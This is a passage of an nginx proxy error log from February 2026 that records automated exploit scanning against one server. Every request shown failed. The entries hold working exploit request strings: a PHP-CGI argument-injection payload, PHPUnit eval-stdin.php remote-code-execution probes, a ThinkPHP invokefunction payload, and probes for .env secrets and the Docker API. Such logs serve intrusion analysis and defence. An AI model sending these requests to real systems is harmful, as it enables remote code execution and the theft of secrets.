/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:29 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:30 [error] 952#952: *96961 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:31 [error] 952#952: *96961 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:32 [error] 952#952: *96961 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:32 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:33 [error] 952#952: *96961 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:34 [error] 952#952: *96961 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:35 [error] 952#952: *96961 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:36 [error] 952#952: *96961 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:37 [error] 952#952: *96961 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:38 [error] 952#952: *96961 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:38 [error] 952#952: *96961 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:39 [error] 952#952: *96961 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:40 [error] 952#952: *96961 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:41 [error] 952#952: *96961 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:41 [error] 952#952: *96961 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 08:44:42 [error] 952#952: *96961 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 141.11.184.156, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 09:57:02 [error] 952#952: *96987 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.82, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51" +2026/02/18 10:34:11 [error] 950#950: *96995 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 10:57:12 [error] 950#950: *97010 open() "/var/www/html/manager/html" failed (2: No such file or directory), client: 20.65.195.124, server: localhost-nginx-proxy-manager, request: "GET /manager/html HTTP/1.1", host: "222.117.41.51" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:06 [error] 952#952: *98614 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:07 [error] 952#952: *98614 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:08 [error] 952#952: *98614 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 11:27:09 [error] 952#952: *98614 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 118.193.37.92, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 12:46:44 [error] 962#962: *98794 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 13:05:55 [error] 962#962: *98800 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.82, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51" +2026/02/18 13:15:31 [error] 967#967: *100366 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 162.142.125.35, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "222.117.41.51" +2026/02/18 14:59:31 [error] 962#962: *100695 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:32 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:32 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:33 [error] 962#962: *100695 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.232.121.71, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" +2026/02/18 14:59:33 [error] 962#962: *100695 open() 